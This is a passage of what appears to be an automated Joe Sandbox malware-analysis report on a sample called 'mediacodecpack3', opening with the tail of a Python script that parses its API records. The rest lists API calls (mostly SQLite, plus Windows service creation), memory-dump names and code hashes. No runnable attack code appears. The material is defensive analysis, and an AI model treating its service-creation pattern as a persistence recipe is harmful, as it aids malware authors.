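  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
"""

# Sample input copied from the record for the function at 6094A72B on this page.
SAMPLE_BLOB = """\
• sqlite3_bind_int64.SQLITE3 ref: 6094A72B
• sqlite3_step.SQLITE3 ref: 6094A73C
• sqlite3_column_blob.SQLITE3 ref: 6094A760
• sqlite3_column_bytes.SQLITE3 ref: 6094A77C
• sqlite3_malloc.SQLITE3 ref: 6094A793
• sqlite3_reset.SQLITE3 ref: 6094A7F2
• sqlite3_free.SQLITE3(?), ref: 6094A87C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
"""


if __name__ == "__main__":
    for sample in (SAMPLE_REUSE, SAMPLE_BLOB):
        calls = parse_api_block(sample)
        print(api_id(calls))
        print(" -> ".join(f"{api}@{ref:08X}" for ref, api in direct_sequence(calls)))
```

Running it on the two samples reproduces the API ID lines printed in those records, and the direct sequence of the first one reads as two bind_int64 -> step -> reset rounds, the shape of a reused prepared statement. The same rule reproduces the four-tier ID of the 609693A5 record above, which is a quick sanity check when comparing records across reports.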
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                            • String ID: 2$foreign key$indexed
                                                                                            • API String ID: 4126863092-702264400
                                                                                            • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                            • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                            • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                            • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                            • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2794791986-0
                                                                                            • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                            • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                            • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                            • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                            • API String ID: 912767213-1308749736
                                                                                            • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                            • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                            • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                              • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 4082478743-0
                                                                                            • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                            • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                            • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                            • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                              • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$INTEGER
                                                                                            • API String ID: 317512412-1676293250
                                                                                            • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                            • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                            • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                            • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                            • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2802900177-0
                                                                                            • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                            • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                            • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                            • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 4038589952-0
                                                                                            • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                            • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 247099642-0
                                                                                            • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                            • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                            • String ID:
                                                                                            • API String ID: 326482775-0
                                                                                            • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                            • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                            APIs
                                                                                            • CreateServiceA.ADVAPI32 ref: 00401CFB
                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00401EEA
                                                                                            • CloseServiceHandle.ADVAPI32(?), ref: 0040D23C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Create
                                                                                            • String ID:
                                                                                            • API String ID: 2095555506-0
                                                                                            • Opcode ID: 798336170624c8ac89b9a2c31719ae8e1c376ef6816bfeab9d8cee1d71777bcc
                                                                                            • Instruction ID: 94f379f039eced8726fb3cb338ec06236e1c18fcefb958c6377dd5f00325babe
                                                                                            • Opcode Fuzzy Hash: 798336170624c8ac89b9a2c31719ae8e1c376ef6816bfeab9d8cee1d71777bcc
                                                                                            • Instruction Fuzzy Hash: A6D09E31D44114EACF201BD19D48D6E2E79A7443A4F2504BAE501760F0C6799946FA5A
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                            • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                            • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                            • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                            • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                            • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                            • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                            • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                            • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
Memory Dump Source
• Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: 4fe4cdbd69d76611cbe8f8d839fbcf879ed414cccbfa791050e202b1d5f79f32
• Instruction ID: da040a5c410dac6804bc47ba04513fdabb8688a912b3c46f63b6c3d26f8cee3d
• Opcode Fuzzy Hash: 4fe4cdbd69d76611cbe8f8d839fbcf879ed414cccbfa791050e202b1d5f79f32
• Instruction Fuzzy Hash: B7E09A30811919DBDB50AF60DE887DA73B4FB82751F0081F6C84AB6191C7308A9ACF9A
Memory Dump Source
• Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp
